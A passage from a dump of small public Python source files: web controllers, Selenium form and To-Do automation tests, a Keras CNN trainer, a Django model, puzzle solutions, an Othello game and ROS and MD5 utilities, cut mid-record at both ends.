redirect(url_for('index'))\n\n\n","repo_name":"OlanSal/fyyur-webapp-project","sub_path":"controllers/artists.py","file_name":"artists.py","file_ext":"py","file_size_in_byte":6030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37546426605","text":"import xlrd\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver import ActionChains\nimport time\n\ndriver = webdriver.Chrome(ChromeDriverManager().install())\ndriver.implicitly_wait(10)\ndriver.get('https://www.orangehrm.com/orangehrm-30-day-trial/')\n\nurl= driver.find_element(By.ID,'Form_submitForm_subdomain')\nfirstname = driver.find_element(By.ID,'Form_submitForm_FirstName')\nlastname = driver.find_element(By.ID,'Form_submitForm_LastName')\nemailid= driver.find_element(By.ID,'Form_submitForm_Email')\njobtitle= driver.find_element(By.ID,'Form_submitForm_JobTitle')\ncompany= driver.find_element(By.ID,'Form_submitForm_CompanyName')\nphone= driver.find_element(By.ID,'Form_submitForm_Contact')\ntotalemp= driver.find_element(By.ID,'Form_submitForm_NoOfEmployees')\nindustry= driver.find_element(By.ID,'Form_submitForm_Industry')\ncountry= driver.find_element(By.ID,'Form_submitForm_Country')\n\n\n\n\n\nworkbook= xlrd.open_workbook('file_example_XLS_10.xls')\n\n\n#get total row count\nsheet= workbook.sheet_by_name(\"registration\")\nrowcount = sheet.nrows\ncolnum = sheet.ncols\nprint(\"Total row count\",rowcount,\"Total col count\",colnum)\nfor row_con in range(1, rowcount):\n url_= sheet.cell_value(row_con,0)\n first_name = sheet.cell_value(row_con,1)\n last_name = sheet.cell_value(row_con, 2)\n email_id = sheet.cell_value(row_con, 3)\n job_title = sheet.cell_value(row_con, 4)\n company_ = sheet.cell_value(row_con, 5)\n phone_ = sheet.cell_value(row_con, 6)\n total_emp = sheet.cell_value(row_con, 7)\n industry_ = sheet.cell_value(row_con, 8)\n country_ = sheet.cell_value(row_con, 9)\n\n url.clear()\n url.send_keys(url_)\n firstname.clear()\n firstname.send_keys(first_name)\n lastname.clear()\n lastname.send_keys(last_name)\n emailid.clear()\n emailid.send_keys(email_id)\n jobtitle.clear()\n jobtitle.send_keys(job_title)\n phone.clear()\n phone.send_keys(phone_)\n country.send_keys(country_)\n\ndriver.quit()\n","repo_name":"sagarpitla/SeleniumProject","sub_path":"ExcelRead.py","file_name":"ExcelRead.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35140418122","text":"import os\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.callbacks import EarlyStopping, ReduceLROnPlateau\r\nfrom keras.regularizers import l2\r\n\r\n# Set your data directory\r\ndata_dir = './dataset'\r\n\r\n# Hyperparameters\r\nbatch_size = 32\r\ninput_shape = (64, 64, 3)\r\nepochs = 50\r\npatience = 10\r\n\r\n# Define the CNN architecture\r\nmodel = Sequential()\r\n\r\nmodel.add(Conv2D(32, (3, 3), padding='same', activation='relu', input_shape=input_shape))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\nmodel.add(Dropout(0.3))\r\n\r\nmodel.add(Conv2D(64, (3, 3), padding='same', activation='relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\nmodel.add(Dropout(0.3))\r\n\r\nmodel.add(Conv2D(128, (3, 3), padding='same', activation='relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\nmodel.add(Dropout(0.3))\r\n\r\nmodel.add(Flatten())\r\n\r\nmodel.add(Dense(512, activation='relu', kernel_regularizer=l2(0.001)))\r\nmodel.add(Dropout(0.5))\r\n\r\nmodel.add(Dense(3, activation='softmax'))\r\n\r\n# Use a smaller initial learning rate\r\nfrom keras.optimizers import Adam\r\noptimizer = Adam(learning_rate=0.0001)\r\n\r\nmodel.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy'])\r\n\r\n# Prepare the data generators\r\ntrain_datagen = ImageDataGenerator(rescale=1./255, shear_range=0.2, zoom_range=0.2, horizontal_flip=True)\r\ntest_datagen = ImageDataGenerator(rescale=1./255)\r\n\r\ntrain_generator = train_datagen.flow_from_directory(\r\n os.path.join(data_dir, 'train'),\r\n target_size=input_shape[:2],\r\n batch_size=batch_size,\r\n class_mode='categorical')\r\n\r\ntest_generator = test_datagen.flow_from_directory(\r\n os.path.join(data_dir, 'test'),\r\n target_size=input_shape[:2],\r\n batch_size=batch_size,\r\n class_mode='categorical')\r\n\r\n# Define early stopping\r\nearly_stopping = EarlyStopping(monitor='val_loss', patience=patience, verbose=1, mode='min', restore_best_weights=True)\r\n\r\n# Add a learning rate scheduler\r\nreduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.2, patience=5, min_lr=0.00001, verbose=1)\r\n\r\n# Train the model\r\nhistory = model.fit(train_generator, epochs=epochs, validation_data=test_generator, callbacks=[early_stopping, reduce_lr])\r\n\r\n# Save the model\r\nmodel.save('asl_cnn_model.h5')\r\n\r\n# Evaluate the model on the test set\r\nscores = model.evaluate(test_generator)\r\n\r\nprint('Test loss:', scores[0])\r\nprint('Test accuracy:', scores[1])\r\n\r\n","repo_name":"UMAIRAHMED-111/American-Sign-Language-Interpreter-CNN","sub_path":"ModelTrain.py","file_name":"ModelTrain.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39846922681","text":"from setuptools import setup\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\nwith open(path.join(here, 'README.rst'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='cache.me',\n version='0.1.1',\n description='A library for caching function calls.',\n long_description=long_description,\n url='https://github.com/jaredlgillespie/cache.me',\n author='Jared Gillespie',\n author_email='jaredlgillespie@hotmail.com',\n license='MIT',\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: Implementation :: CPython',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Utilities'\n ],\n keywords='cache.me cache decorator',\n packages=['cachme'],\n test_suite='tests'\n)\n","repo_name":"JaredLGillespie/cache.me","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"37784647771","text":"from django.db import models\nfrom ckeditor.fields import RichTextField\nfrom PIL import Image\ntry:\n from StringIO import StringIO\nexcept ImportError:\n from io import StringIO\nfrom django.core.files.base import ContentFile\n# Create your models here.\n\nclass OurChildren(models.Model):\n first_name = models.CharField(max_length=50, null=True, blank=True)\n last_name = models.CharField(max_length=50, blank=True, null=True)\n age = models.IntegerField(blank=True, null=True)\n content = RichTextField()\n\n image = models.ImageField(upload_to = \"static/images/our_children\")\n\n\n def __str__(self):\n return \" %s %s\" % (self.first_name , self.last_name)\n\n def get_name(self):\n return (self.first_name)\n\n def get_thumbnail(self, thumb_size=None):\n\n base = Image.open(StringIO(self.image.read())) # get the image\n size = thumb_size\n if not thumb_size:\n rate = 0.2\n size = base.size\n size = (int(size[0] * rate), int(size[1] * rate))\n base.thumbnail(size)\n thumbnail = StringIO()\n base.save(thumbnail, 'PNG')\n thumbnail = ContentFile(thumbnail.getvalue())\n return thumbnail","repo_name":"Abenezeryakob/FreedomCharity","sub_path":"project/our_children/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30112816113","text":"def old_macdonald(name):\n first_part = name[:3]\n second_half = name[3:]\n return first_part.capitalize() + second_half.capitalize()\n\n\n# Check\nprint(old_macdonald('macdonald'))\n\n\ndef master_yoda(text):\n list_to_reverse = text.split(' ')\n list_to_reverse.reverse()\n return ' '.join(list_to_reverse)\n\n\n# Check\nprint(master_yoda('I am home'))\nprint(master_yoda('We are ready'))\n\n\ndef almost_there(n):\n return (abs(100 - n) <= 10) or (abs(200 - n) <= 10)\n\n\n# Check\nprint(almost_there(104))\nprint(almost_there(150))\nprint(almost_there(209))\n","repo_name":"JAntonioMarin/PythonBootcamp","sub_path":"Section6/46.py","file_name":"46.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74292749904","text":"from selenium.webdriver import Firefox\nfrom selenium.webdriver.common.keys import Keys\nimport time\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nimport csv\nurl\t= 'https://login.live.com/oauth20_authorize.srf?response_type=token&client_id=000000004C18365E&redirect_uri=https%3A%2F%2Fto-do.live.com%2Ftasks%2Fauth%2Fcallback&scope=https://graph.microsoft.com/User.Read&state=eyJ0b2tlblR5cGUiOiJncmFwaFRva2VuIiwiZmxvd1R5cGUiOiJtc2EifQ==&aadredir=1'\n\nnavegador\t= Firefox()\n\nnavegador.get(url)\ntime.sleep(6)\nelemento\t= navegador.find_element_by_xpath(\"//input[@class='form-control ltr_override input ext-input text-box ext-text-box' and @name='loginfmt']\")\nelemento.click()\nelemento.clear()\nelemento.send_keys(\"EMAIL@outlook.com\")\nbotao_elemento\t= navegador.find_element_by_id('idSIButton9')\nbotao_elemento.click()\ntime.sleep(5)\nsenha_elemento\t= navegador.find_element_by_xpath(\"//input[@class='form-control input ext-input text-box ext-text-box' and @name='passwd']\")\nsenha_elemento.click()\nsenha_elemento.clear()\nsenha_elemento.send_keys(\"SENHA@123\")\nbotao_elemento\t= navegador.find_element_by_id('idSIButton9')\nbotao_elemento.click()\ntime.sleep(5)\nbotao_elemento\t= navegador.find_element_by_id('idSIButton9')\nbotao_elemento.click()\ntime.sleep(10)\n\n\n\ndef nova_tarefa(tarefa):\n\tnova_tarefa\t= navegador.find_element_by_id('baseAddInput-addTask') # Adicionar a tarefa\n\tnova_tarefa.send_keys(tarefa) # Nome da tarefa\n\tnova_tarefa.send_keys(Keys.RETURN)\ndef nova_lista(lista):\n\tnova_lista\t= navegador.find_element_by_id('baseAddInput-addList')\n\tnova_lista.send_keys(lista) #Criando o nome da Lista\n\tnova_lista.send_keys(Keys.RETURN) #Pressinando enter para colocar ela\n\t\nnova_lista('Livros') \nvalidar_lista\t= navegador.find_element_by_xpath(f\"//span[text()='Livros']\") # Procura pela lista criada\nvalidar_lista.click()\nnova_tarefa('A arte da Guerra')\nnova_tarefa('A Cauda Longa')\nnova_tarefa('A Torre Negra')\nvalidar_lista.click() \nvalidar_tarefa\t= navegador.find_elements_by_xpath('//span[@class=\"checkBox big\"]')\nlistando_livros\t= navegador.find_elements_by_class_name(\"taskItem-title\")\nachando_importante = navegador.find_elements_by_xpath('//span[@class=\"importanceButton\"]')\nachando_importante[0].click()\n\n#Validação\n\n\ntime.sleep(3)\n\n\n\ntry:\n\tachando_titulo_criado = navegador.execute_script(\"\"\" return Array.prototype.slice.call(document.getElementsByClassName(\"listItem-title listItem-titleParsed\")).filter(function (x) { return x.textContent === \"Livros\";});\"\"\")\n\tassert len(achando_titulo_criado) == 1\n\tnome_correto = achando_titulo_criado[0].text\n\tvalidador = nome_correto == 'Livros'\n\tprint(f\"Lista foi criado? : {validador}\")\n\nexcept:\n\tprint(\"Titulo não criado\")\n\ntime.sleep(2)\n\nachando_nome_criado\t = navegador.find_elements_by_xpath('//span[@class=\"taskItem-title\"]')\n\n\nnome1 = achando_nome_criado[0].text\nnome2 = achando_nome_criado[1].text\nnome3 = achando_nome_criado[2].text\n\nprint(\"Teste de Nomes criados: A Cauda Longa, A arte da Guerra, A torre Negra\")\nif nome2 == 'A Cauda Longa':\n\tprint(\"Teste: OK\")\nelse:\n\tprint(\"Teste: ERRO\")\nif nome3 == 'A arte da Guerra':\n\tprint(\"Teste: OK\")\nelse:\n\tprint(\"Teste: ERRO\")\nif nome1 == 'A Torre Negra':\n\tprint(\"Teste: OK\")\nelse:\n\tprint(\"Teste: ERRO\")\n\ntime.sleep(2)\n\n\nvalidar_importante = achando_nome_criado[1].find_element_by_xpath('//span[@class=\"importanceButton color-theme\"]')\n\ntry:\n\tvalidar_importante.find_element_by_xpath('//i[@class=\"icon fontIcon ms-Icon ms-Icon--FavoriteStarFill iconSize-20\"]')\n\tprint(\"A torre negra está como importante\")\nexcept:\n\tprint(\"A torre negra não está como importante\")\n\n\n\n\narq_listas_livros = open('livros.csv', 'r')\nlista_livros = arq_listas_livros.read().split('\\n')\narq_listas_livros.close()\n\nlivro1 = lista_livros[1]\nlivro2 = lista_livros[2]\nlivro3 = lista_livros[3]\nlivro4 = lista_livros[4]\nlivro5 = lista_livros[5]\nlivro6 = lista_livros[6]\nlivro7 = lista_livros[7]\nlivro8 = lista_livros[8]\nlivro9 = lista_livros[9]\nlivro10 = lista_livros[10]\n\n\nnova_lista('Meus Livros')\nnova_tarefa(f'{livro1}')\ntime.sleep(2)\nnova_tarefa(f'{livro2}')\ntime.sleep(2)\nnova_tarefa(f'{livro3}')\ntime.sleep(2)\nnova_tarefa(f'{livro4}')\ntime.sleep(2)\nnova_tarefa(f'{livro5}')\ntime.sleep(2)\nnova_tarefa(f'{livro6}')\ntime.sleep(2)\nnova_tarefa(f'{livro7}')\ntime.sleep(2)\nnova_tarefa(f'{livro8}')\ntime.sleep(2)\nnova_tarefa(f'{livro9}')\ntime.sleep(2)\nnova_tarefa(f'{livro10}')\n\ntime.sleep(3)\nvalidar_tarefa_ativa = navegador.find_element_by_xpath('//li[@class=\"listItem-container active\"]')\nvalidar_tarefa\t= validar_tarefa_ativa.find_elements_by_xpath('//span[@class=\"checkBox big\"]')\nlistando_livros\t= validar_tarefa_ativa.find_elements_by_class_name(\"taskItem-title\")\nachando_checkbox\t= validar_tarefa_ativa.find_elements_by_xpath('//span[@class=\"checkBox big\"]')\nachando_checkbox[0].click()\nachando_checkbox\t= validar_tarefa_ativa.find_elements_by_xpath('//span[@class=\"checkBox big\"]')\nachando_checkbox[1].click()\nachando_importante = validar_tarefa_ativa.find_elements_by_xpath('//span[@class=\"importanceButton\"]')\nachando_importante[4].click()\nachando_importante = validar_tarefa_ativa.find_elements_by_xpath('//span[@class=\"importanceButton\"]')\nachando_importante[5].click()\nachando_importante = validar_tarefa_ativa.find_elements_by_xpath('//span[@class=\"importanceButton\"]')\nachando_importante[6].click()\n\ntry:\n\tachando_titulo_criado = navegador.execute_script(\"\"\" return Array.prototype.slice.call(document.getElementsByClassName(\"listItem-title listItem-titleParsed\")).filter(function (x) { return x.textContent === \"Meus Livros\";});\"\"\")\n\tassert len(achando_titulo_criado) == 1\n\n\tnome_correto = achando_titulo_criado[0].text\n\tvalidador = nome_correto == 'Meus Livros'\n\tprint(f\"Lista foi criado? : {validador}\")\n\nexcept:\n\tprint(\"Titulo não criado\")\n\nachando_nome_criado\t = validar_tarefa_ativa.find_elements_by_xpath('//span[@class=\"taskItem-title\"]')\n\n\nwitcher = achando_nome_criado[0].text\ndificil = achando_nome_criado[1].text\nportugues = achando_nome_criado[2].text\nler = achando_nome_criado[3].text\nviagem = achando_nome_criado[4].text\ngalaxia = achando_nome_criado[5].text\ninteligencia = achando_nome_criado[6].text\nsapiens = achando_nome_criado[7].text\nscrum = achando_nome_criado[8].text\nsherlock = achando_nome_criado[9].text\nprint(\"Teste de Nomes criados:\")\nif inteligencia == 'Como aprender inteligencia':\n\tprint(\"Teste: OK\")\nelse:\n\tprint('Teste: ERRO')\nif witcher == 'The Witcher: O último desejo':\n\tprint(\"Teste: OK\")\nelse:\n\tprint(\"Teste: ERRO\")\nif portugues == 'Guia pratico do portugues correto VOL 1':\n\tprint(\"Teste: OK\")\nelse:\n\tprint(\"Teste: ERRO\")\nif ler == 'Como Ler Livros':\n\tprint(\"Teste: OK\")\nelse:\n\tprint(\"Teste: ERRO\")\nif viagem == 'Esta não é mais uma historia sobre viagens no tempo':\n\tprint(\"Teste: OK\")\nelse:\n\tprint(\"Teste: ERRO\")\nif galaxia == 'Guia do mochilheiro da galaxia':\n\tprint(\"Teste: OK\")\nelse:\n\tprint(\"Teste: ERRO\")\nif dificil == 'O Lado Dificil das situaçoes dificeis':\n\tprint(\"Teste: OK\")\nelse:\n\tprint(\"Teste: ERRO\")\nif sapiens == 'Uma breve historia da humanidade: Sapiens':\n\tprint(\"Teste: OK\")\nelse:\n\tprint(\"Teste: ERRO\")\nif sherlock == 'Sherlock Holmes':\n\tprint(\"Teste: OK\")\nelse:\n\tprint(\"Teste: ERRO\")\nif scrum == 'SCRUM a arte de fazer o dobro do trabalho pela metade do tempo':\n\tprint(\"Teste: OK\")\nelse:\n\tprint(\"Teste: ERRO\")\n\n\nvalidar_importante = achando_nome_criado[8].find_element_by_xpath('//span[@class=\"importanceButton color-theme\"]')\n\ntry:\n\tvalidar_importante.find_element_by_xpath('//i[@class=\"icon fontIcon ms-Icon ms-Icon--FavoriteStarFill iconSize-20\"]')\n\tprint(\"está como importante: OK\")\nexcept:\n\tprint(\"ESTÁ COMO IMPORTANTE : ERRO \")\n\nvalidar_importante = achando_nome_criado[1].find_element_by_xpath('//span[@class=\"importanceButton color-theme\"]')\n\ntry:\n\tvalidar_importante.find_element_by_xpath('//i[@class=\"icon fontIcon ms-Icon ms-Icon--FavoriteStarFill iconSize-20\"]')\n\tprint(\"está como importante: OK\")\nexcept:\n\tprint(\"ESTÁ COMO IMPORTANTE : ERRO \")\n\nvalidar_importante = achando_nome_criado[0].find_element_by_xpath('//span[@class=\"importanceButton color-theme\"]')\n\ntry:\n\tvalidar_importante.find_element_by_xpath('//i[@class=\"icon fontIcon ms-Icon ms-Icon--FavoriteStarFill iconSize-20\"]')\n\tprint(\"está como importante: OK\")\nexcept:\n\tprint(\"ESTÁ COMO IMPORTANTE : ERRO \")\n\t\n\n","repo_name":"lealcb/exercicio2","sub_path":"Automação WEB.py","file_name":"Automação WEB.py","file_ext":"py","file_size_in_byte":8359,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73971061266","text":"import sys\nfrom collections import deque\n\ninput=sys.stdin.readline\n\nm,n,h=map(int,input().split())\ngraph=[[[] for _ in range(n)] for _ in range(h)]\nflag0=False\ndef pr(graph):\n for i in graph:\n for j in i:\n for hh in j:\n print(hh,end=\" \")\n print()\n print()\n print()\n\nfor hh in range(h):\n for i in range(n):\n li=list(map(int,input().split()))\n for j in li:\n if j==0:\n flag0=True\n graph[hh][i].append(j)\n\nif flag0==False:\n print(0)\n\ndx=[0,0,0,0,1,-1]\ndy=[0,0,-1,1,0,0]\ndh=[-1,1,0,0,0,0]\nq=deque()\n\ndef bfs(q):\n count=0\n while q:\n a=[]\n while q:\n now=q.popleft()\n for i in range(6):\n nh=now[0]+dh[i]\n nx=now[1]+dx[i]\n ny=now[2]+dy[i]\n if not 0<=nh0:\n flag=True\nif flag==True:\n print(-1)\nelif flag0==True:\n print(v)\n\n\n","repo_name":"Yoo-sumi/Programmers","sub_path":"백준/DFS_BFS/7579.py","file_name":"7579.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32351350806","text":"# Ryan Martin\n# Dr. Mullen\n# CS5001\n# 12/05/2018\n\nfrom piece import Piece\nfrom move import Move\nimport sys\n\n\nclass GameController:\n \"\"\"Indicates the beginnning and ending of the game.\"\"\"\n def __init__(self, width, piece):\n self.width = width\n self.counter = 0\n self.piece = piece\n self.area = [[0, 1], [1, 1], [1, 0], [1, -1],\n [0, -1], [-1, -1], [-1, 0], [-1, 1]]\n self.valid_list = []\n self.second_turn_counter = 0\n\n def start_game(self, row, column):\n if self.valid(row, column):\n if self.counter % 2 == 0:\n self.piece.total_row[row][column].display('True')\n self.flip_piece(row, column)\n self.counter += 1\n print(\"Computers's turn.\")\n\n def valid_helper(self):\n \"\"\" A method that checks for available legal moves for player\"\"\"\n self.valid_list = []\n if self.counter % 2 == 0:\n current_player = 'player'\n other_player = 'Computer'\n else:\n current_player = 'Computer'\n other_player = 'Player'\n\n for i in range(8):\n for j in range(8):\n if self.valid(i, j):\n self.valid_list.append([i, j])\n if len(self.valid_list) > 0:\n valid_helper = True\n else:\n print(\"No valid move for {}. {}'s turn.\".format(current_player,\n other_player))\n valid_helper = False\n self.counter += 1\n return valid_helper\n\n def on_edge(self, row, column):\n \"\"\"A helper method that will help the computer choose the best move\n int\"\"\"\n if row == 0 or column == 7 or column == 0 or row == 7:\n return True\n\n def on_corner(self, row, column):\n \"\"\"A helper method that will help the computer choose the second best move\n int\"\"\"\n if (row == 0 and column == 0) or (row == 0 and column == 7) or \\\n (row == 7 and column == 0) or (row == 7 and column == 7):\n return True\n\n def on_third(self, row, column):\n \"\"\"A helper method that will help the computer choose the third best move\n int\"\"\"\n if row == 2 or column == 5 or column == 2 or row == 5:\n return True\n\n def computer_moves(self):\n \"\"\"An AI that ranks the best moves and makes the moves based on open spaces\n List -> List\"\"\"\n self.second_turn_counter = 0\n best_move = ''\n if self.valid_helper():\n temp_y, temp_x = self.valid_list[0]\n temp = len(self.piece.total_row[temp_y][temp_x].flips_list)\n for row, column in self.valid_list:\n if self.on_corner(row, column):\n y = row\n x = column\n break\n elif self.on_edge(row, column):\n y = row\n x = column\n best_move = 'Second'\n continue\n elif self.on_third(row, column):\n if best_move == 'Second':\n continue\n else:\n y = row\n x = column\n best_move = 'Third'\n continue\n else:\n if best_move == 'Second' or best_move == 'Third':\n continue\n else:\n if len(self.piece.total_row[row][column].flips_list)\\\n >= temp:\n y = row\n x = column\n temp = len(self.piece.total_row[y][x].flips_list)\n else:\n continue\n\n self.piece.total_row[y][x].display('False')\n self.flip_piece(y, x)\n self.counter += 1\n print(\"Player's turn.\")\n if not self.valid_helper():\n self.second_turn_counter += 1\n if not self.valid_helper():\n self.second_turn_counter += 1\n else:\n self.second_turn_counter += 1\n if not self.valid_helper():\n self.second_turn_counter += 1\n\n if self.second_turn_counter == 2:\n print('No moves for either player. Gameover.')\n self.game_over()\n\n def valid(self, row, column):\n valid_area = False\n other_color = self.other_color()\n current_color = self.current_color()\n\n for y_value, x_value in self.area:\n y = row\n x = column\n y += y_value\n x += x_value\n if not self.on_board(y, x):\n continue\n else:\n if self.piece.total_row[row][column].color == 3 \\\n and self.piece.total_row[y][x].color == other_color:\n while True:\n x += x_value\n y += y_value\n if not self.on_board(y, x):\n break\n elif self.piece.total_row[y][x].color == current_color:\n valid_area = True\n while True:\n x -= x_value\n y -= y_value\n if y == row and x == column:\n break\n self.piece.total_row[row][column].flips_list\\\n .append(self.piece.total_row[y][x])\n break\n return valid_area\n\n def flip_piece(self, row, column):\n \"\"\"A method which displays the pieces after they are captured\"\"\"\n for move in self.piece.total_row[row][column].flips_list:\n if self.counter % 2 == 0:\n move.display('True')\n else:\n move.display('False')\n\n def current_color(self):\n other_color = self.other_color()\n if other_color == 1:\n current_color = 0\n else:\n current_color = 1\n return current_color\n\n def on_board(self, x, y):\n \"\"\"A helper method for in bounds\"\"\"\n if x <= 7 and x >= 0 and y <= 7 and y >= 0:\n return True\n\n def other_color(self):\n if self.counter % 2 == 0:\n other_color = 1\n else:\n other_color = 0\n\n return other_color\n\n def game_over(self):\n \"\"\"A method which provides the scores at the end of the game\"\"\"\n black_score = 0\n white_score = 0\n for row in self.piece.total_row:\n for move in row:\n if move.color == 0:\n black_score += 1\n elif move.color == 1:\n white_score += 1\n if black_score > white_score:\n score_1 = black_score\n score_2 = white_score\n winner = 'Player wins:'\n fill(255, 0, 0)\n textSize(20)\n text(\"Gameover. {} {} - {}\". format(winner, score_1, score_2),\n self.width/2 - self.width/3, self.width/2)\n # If the player wins, the program will prompt the user for their\n # name to be placed in the scores file. If the user's score is\n # greater than the highest score, their name and score will be\n # listed on the top of the scores list.\n\n def input(self, message=''):\n from javax.swing import JOptionPane\n return JOptionPane.showInputDialog(frame, message)\n answer = input('enter your name')\n if answer:\n print('Hi ' + answer)\n elif answer == '':\n print('[empty string]')\n else:\n print(answer)\n scores_list = []\n f = open('scores.txt', 'r+')\n data_list = []\n result = answer + \" \" + str(score_1)\n for line in f:\n data_list.append(line)\n if len(data_list) == 0:\n f.write(result)\n else:\n first_line = data_list[0].split()\n score = int(first_line[-1])\n if score_1 > score:\n for i in range(len(data_list)):\n result += '\\n' + data_list[i]\n f.seek(0)\n f.write(result)\n else:\n result = '\\n' + result\n f.write(result)\n f.close()\n elif white_score > black_score:\n score_1 = black_score\n score_2 = white_score\n winner = 'Computer wins:'\n fill(255, 0, 0)\n textSize(20)\n text(\"Gameover. {} {} - {}\". format(winner, score_2, score_1),\n self.width/2 - self.width/3, self.width/2)\n else:\n score_1 = black_score\n score_2 = white_score\n winner = 'Tie game:'\n fill(255, 0, 0)\n textSize(20)\n text(\"Gameover. {} {} - {}\". format(winner, score_2, score_1),\n self.width/2 - self.width/3, self.width/2)\n","repo_name":"Ryan-Ray-Martin/PythonProjects","sub_path":"Othello Game Python/othello_game/game_controller.py","file_name":"game_controller.py","file_ext":"py","file_size_in_byte":9201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34110438501","text":"ROUND_RESULT = {\n 'X' : 'LOSE',\n 'Y' : 'DRAW',\n 'Z' : 'WIN'\n}\n\nROCK = {\n 'WIN' : 'paper',\n 'DRAW' : 'rock',\n 'LOSE' : 'scissors'\n}\n\nPAPER = {\n 'WIN' : 'scissors',\n 'DRAW' : 'paper',\n 'LOSE' : 'rock'\n}\n\nSCISSORS = {\n 'WIN' : 'rock',\n 'DRAW' : 'scissors',\n 'LOSE' : 'paper'\n}\n\ndef player_move(elf_choice, round_result):\n expected_result = ROUND_RESULT[round_result]\n if elf_choice == 'A':\n return ROCK[expected_result]\n elif elf_choice == 'B':\n return PAPER[expected_result]\n else:\n return SCISSORS[expected_result]\n\nprint(player_move('A', 'Z'))","repo_name":"sghendryx/Advent-of-Code-2022","sub_path":"2022_Python/Day 2/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73876516625","text":"import hashlib\nimport os\n\n\ndef get_str_md5(str):\n md5_obj = hashlib.md5()\n md5_obj.update(str.encode('utf-8'))\n return md5_obj.hexdigest()\n\n\ndef get_file_md5(filepath):\n if os.path.isfile(filepath):\n md5_obj = hashlib.md5()\n f = open(filepath, 'rb')\n while True:\n b = f.read(8096)\n if not b:\n break\n md5_obj.update(b)\n f.close()\n return md5_obj.hexdigest()\n\n\nif __name__ == '__main__':\n print(get_str_md5(\"http://localhost:8000/users/login/\"))\n # print(fileMD5('D:\\\\Download\\\\Xunlei\\\\Solo.A.Star.Wars.Story.2018.1080p.BluRay.x264-SPARKS[rarbg]\\\\solo.a.star.wars.story.2018.1080p.bluray.x264-sparks.mkv'))\n\n","repo_name":"ChenjxJames/xyb","sub_path":"base/MD5.py","file_name":"MD5.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17929394626","text":"#!/usr/bin/env python\n###############################################################################\n# Duckietown - Project Unicorn ETH\n# Author: Simon Schaefer\n# Subscribe and store compressed image. \n###############################################################################\nimport cv2\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom os.path import isdir\nimport rospy\nfrom sensor_msgs.msg import CompressedImage\n\nclass Main(): \n\n def __init__(self): \n self.bridge = CvBridge()\n topic = rospy.get_param(\"/imagemsg_to_png/img_topic\")\n rospy.Subscriber(topic, CompressedImage, self.callback)\n self.i = 0\n self.storage_path = rospy.get_param(\"/imagemsg_to_png/storage_dir\")\n if not isdir(self.storage_path): \n raise OSError(\"Invalid storage path !\")\n rospy.spin()\n \n def callback(self, data):\n \"\"\"Store message data as png.\"\"\"\n try: \n frame = self.bridge.compressed_imgmsg_to_cv2(data, \"bgr8\")\n except CvBridgeError as e:\n rospy.logfatal(e)\n name = self.storage_path + \"/\" + str(self.i) + \".png\"\n cv2.imwrite(name, frame)\n self.i += 1\n\nif __name__ == '__main__':\n rospy.init_node('converter_imagemsg_png', anonymous=True)\n try:\n Main()\n except rospy.ROSInterruptException:\n cv2.destroyAllWindows()\n","repo_name":"duckietown-project-unicorn/bag_tools","sub_path":"src/imagemsg_to_png.py","file_name":"imagemsg_to_png.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29619346310","text":"from graphql_tests.helper import base_url\nimport requests\nfrom test_contactBySlug import test_contactBySlug\n\nquery = \"\"\"\nquery allToolIntegrations($id: ID!, $after: String, $first: Int) {\n tool(id: $id) {\n allToolIntegrations(first: $first, after: $after) {\n count\n pageInfo {\n hasNextPage\n endCursor\n __typename\n }\n edges {\n node {\n imageUrl\n thumbUrl\n thumbRetinaUrl\n name\n id\n slug\n path\n __typename\n }\n __typename\n }\n __typename\n }\n id\n __typename\n }\n}\n\"\"\"\n\n\ndef test_allToolIntegrations():\n tool_id = test_contactBySlug()\n variables = 